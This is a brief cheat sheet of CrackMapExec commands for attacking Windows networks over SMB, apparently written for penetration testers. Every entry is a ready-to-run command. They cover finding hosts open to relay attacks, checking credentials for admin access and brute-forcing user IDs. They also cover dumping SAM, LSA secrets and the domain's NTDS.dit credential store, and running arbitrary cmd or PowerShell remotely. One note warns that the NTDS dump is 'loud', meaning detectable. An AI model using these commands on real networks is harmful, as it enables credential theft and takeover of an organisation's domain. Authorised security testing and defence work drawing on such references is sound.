CrackMapExec
Find IP/hostname/SMB signing/etc.:
crackmapexec smb targets.txt
Generate a list of hosts with SMB signing disabled, for relays
crackmapexec smb targets.txt --gen-relay-list relay.txt
Find hosts the user can log into or is admin on
crackmapexec smb targets.txt -u user -p 'password'
Enumerate shares
crackmapexec smb ip -u user -p 'password' --shares
Dump SAM
crackmapexec smb ip -u user -p 'password' --sam
Dump LSA
crackmapexec smb ip -u user -p 'password' --lsa
Pass a cmd command to execute
crackmapexec smb ip -u user -p 'password' -x 'command'
Pass a PowerShell command to execute
crackmapexec smb ip -u user -p 'password' -X 'command'
List users if Guest account is enabled
crackmapexec smb ip -u 'Guest' -p '' --rid-brute
Look at domain admins
crackmapexec smb ip -u user -p 'password' -x 'net group "Domain Admins" /domain'
Look at logged on users
crackmapexec smb ip -u user -p 'password' --loggedon-users
Look at NTDS.dit - is LOUD - USE WITH CAUTION
crackmapexec smb dc-ip -u domain-admin-user -p 'password' --ntds